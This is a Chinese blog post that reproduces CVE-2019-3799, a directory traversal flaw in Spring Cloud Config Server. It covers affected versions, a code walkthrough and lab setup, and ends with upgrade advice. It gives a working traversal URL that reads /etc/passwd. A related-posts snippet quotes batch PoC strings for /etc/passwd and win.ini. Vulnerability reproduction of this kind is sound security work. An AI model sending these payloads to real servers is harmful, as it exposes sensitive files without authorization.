Spring Cloud Config目录遍历漏洞(CVE-2019-3799)

最新推荐文章于 2024-01-02 10:02:10 发布
最新推荐文章于 2024-01-02 10:02:10 发布
阅读量2.3k 收藏 2
点赞数
分类专栏: 漏洞复现篇 文章标签: spring git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42181573/article/details/120333544
版权

漏洞描述

Spring Cloud Config目录遍历漏洞的本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件。攻击者可以构建恶意URL以利用目录遍历漏洞。

漏洞危害

由于spring-cloud-config-server模块未对传入路径进行安全限制,攻击者可以利用多个…%252f进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。

漏洞影响版本

Spring Cloud Config 2.1.0 to 2.1.1
Spring Cloud Config 2.0.0 to 2.0.3
Spring Cloud Config 1.4.0 to 1.4.5
其他较早版本

漏洞分析

Spring Cloud Config Server是Spring为了分布式管理的一个组件,在Server端中负责存储配置,Client可以通过http的形式获取配置值。payload对应的路由存在于org.springframework.cloud.config.server.resource.ResourceController#retrieve()中,其代码
在这里插入图片描述
{name}/{profile}/{label}:name对应仓库名,profile对应配置文件,label为git分支名,一般上都有一个master分支。实际测试中name、profile值无所谓,但是label分支名必须存在。调试跟进getFilePath
在这里插入图片描述
这边已经把%25urldecode为%了,继续跟retrieve(),这边path传入的是我们的payload
在这里插入图片描述
继续跟下findOne,位于org.springframework.cloud.config.server.resource.GenericResourceRepository#findOne
在这里插入图片描述
locations目录file:/C:/Users/icu/AppData/Local/Temp/config-repo-6608031716294156148/是配置文件中git仓库被clone的临时位置,然后拼接…/造成跨目录文件读取。

漏洞复现

手动搭建
进入目录 spring-cloud-config-2.1.0.RELEASE,然后执行下面的命令启动 Spring Cloud Config 服务端:
cd spring-cloud-config-server
…/mvnw spring-boot:run
在这里插入图片描述
Docker搭建
docker-compose build
docker-compose up –d
注:执行docker-compose up –d命令后,需要等待5分钟以上才能访问,开启过程比较慢。
在这里插入图片描述
访问http://IP:8888/foo/label/master/test.json
在这里插入图片描述
抓包,正常访问
在这里插入图片描述
使用get方法传入/foo/label/master/…%252F…%252F…%252F…%252Fetc%252fpasswd
在这里插入图片描述

Poc验证:python3 poc.py –u http://IP:PORT
在这里插入图片描述

修复建议

升级Spring Cloud Config至安全版本,并依据Spring官方文档对应用加固:https://cloud.spring.io/spring-cloud-config/multi/multi__spring_cloud_config_server.html#_security

Li-D
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Rails-doubletap-RCE:使用路径遍历CVE-2019-5418)和Ruby对象反序列化(CVE-2019-5420)的Rails 5.2.2上的RCE
02-06
使用路径遍历CVE-2019-5418)和Ruby对象反序列化的RCE on Rails 5.2.2(CVE-2019-5420) 技术分析: CVE-2019-5418- CVE-2019-5420- //hackerone.com/reports/473888 安全部门: CVE-2019-5418- //groups....
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
Spring Cloud Config目录遍历漏洞CVE-2019-3799)预警
老何的博客
05-29 5909
近日,Spring官方团队在最新的安全更新中披露了一则SpringCloud Config目录遍历漏洞CVE-2019-3799)。漏洞官方定级为High,属于高危漏洞。该漏洞本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件,攻击者可以构造恶意URL实现目录遍历漏洞的利用。 Spring产品介绍 Spring是一个Java/JavaEE/.NET...
eclipse中文件读取路径默认在_Spring Cloud Config Server 路径穿越与任意文件读取漏洞分析 【CVE20193799】...
weixin_35143455的博客
12-18 234
漏洞公告https://pivotal.io/security/cve-2019-3799漏洞复现环境搭建:https://github.com/spring-cloud/spring-cloud-config#quick-startGET /foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd HTTP/1.1Hos...
SpringCloud CVE_2019_3799--CVE_2020_5410 批量poc
weixin_45427650的博客
04-17 821
import requests import argparse import re CVE_2019_3799_win = r'/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini' CVE_2019_3799_linux = r'/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd' CVE_2020_5410_linux = r'/..
spring cloud config server目录遍历漏洞 CVE-2020-5410
weixin_47267061的博客
03-10 439
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
位置穿越服务器,编写Spring Cloud Config Server路径穿越漏洞全面检测脚本
weixin_39798626的博客
08-10 551
Spring Cloud Config Server路径穿越漏洞(CVE-2019-3799)的分析文章已经很多了,这里我不在画蛇填足。在分析该漏洞之后,发现了一些小细节,感觉对该漏洞检测还是挺有帮助的。基于发现的这些细节,我们来构造适应各种场景,甚至各种奇葩场景的批量检测脚本!0x01 简洁原理Spring cloud config 分客户端和服务端。服务端供客户端查询配置,本次漏洞就是出在服务...
Spring Boot 目录遍历CVE-2021-21234)
最新发布
m0_65150886的博客
01-02 870
spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历。1.spring-boot-actuator-logview 升级到0.2.13版本。
Spring Boot 目录遍历CVE-2021_21234)
小小猪的博客
12-31 4243
Spring Boot 目录遍历CVE-2021_21234) 漏洞简介: spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端
Spring Boot存在路径遍历漏洞CVE-2021-22118
日拱一卒无有尽,功不唐捐终入海
08-28 1058
背景:Spring Boot存在路径遍历漏洞。官方 issue也有对此的记录,感兴趣可以看下CVE-2021-22118 是一个在 Spring Boot 中发现的漏洞。该漏洞关系到 Spring Boot 的开发者工具(Devtools)中的远程更新(Remote Update)功能。在某些情况下,攻击者可能会利用这个功能进行目录遍历攻击,从而访问到系统中的敏感文件。远程更新功能被开启(spring.devtools.restart.enabled = true)。
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947)
热门推荐
xiaobai_20190815的博客
04-08 1万+
一、漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 3月1日,VMware发布安全公告,Spring Cloud Gateway中存在远程代码执行漏洞CVE-2022-22947),该漏洞的CVSSv3评分为10.0。当启用或暴露不安全的 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序容易受到代
基于SpringBoot项目的漏洞修复经验
qq_27624807的博客
05-17 1835
漏洞修复
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
thelostworld
02-20 1777
Spring Cloud Config 目录穿越漏洞 (CVE-2020-5410) ​ 一、漏洞简介 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 二、影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cl..
漏洞挖掘之Spring Cloud注入漏洞
m0_67391377的博客
08-31 336
springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。6、应急响应笔记 7、 网络安全学习路线。..
详细介绍一下tomcat的目录遍历漏洞CVE-2020-1938)
04-29
Tomcat 目录遍历漏洞CVE-2020-1938)是一种文件包含漏洞,影响 Apache Tomcat 服务器的 AJP 协议。 AJP 协议(Apache JServ Protocol)是 Apache HTTP Server 与 Tomcat 之间通信的一种协议,可以通过 mod_jk、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值